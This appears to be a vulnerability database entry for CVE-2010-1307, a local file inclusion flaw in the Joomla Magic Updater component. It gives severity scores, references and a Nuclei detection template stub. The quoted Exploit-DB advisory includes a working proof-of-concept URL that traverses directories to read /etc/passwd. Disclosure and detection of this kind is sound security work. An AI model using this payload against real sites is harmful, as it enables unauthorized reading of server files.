CVE-2010-1307
Published: 2010-04-08
Priority: P3 · 37 · medium · 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 10.16% (95.1th percentile)
Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| software.realtyna | com_joomlaupdater | — | — |
No detection rules found.
Exploit-DB
Joomla! Component Magic Updater - Local File Inclusion
exploitdb·2010-04-05
CVE-2010-1307 Joomla! Component Magic Updater - Local File Inclusion
---
Title : Joomla Magic Updater (com_joomlaupdater) LFI Vulnerability
Date : Monday, 05 April 2010 (Indonesia)
Author : Vrs-hCk
Contact : ander[at]antisecurity.org
Blog : http://c0li.blogspot.com/
[+] Exploit
http://[site]/[path]/index.php?option=com_joomlaupdater&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
Greetz :
www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.
# c0li.m0de.0n
Nuclei
Joomla! Component Magic Updater - Local File Inclusion
nuclei·CVSS 5.0
CVE-2010-1307 [MEDIUM] Joomla! Component Magic Updater - Local File Inclusion
A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Template:
```yaml
id: CVE-2010-1307

info:
  name: Joomla! Component Magic Updater - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
```
References:
- http://packetstormsecurity.org/1004-exploits/joomlaupdater-lfi.txt
- http://secunia.com/advisories/39348
- http://www.exploit-db.com/exploits/12070
- http://www.securityfocus.com/bid/39207
- http://www.vupen.com/english/advisories/2010/0806
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57531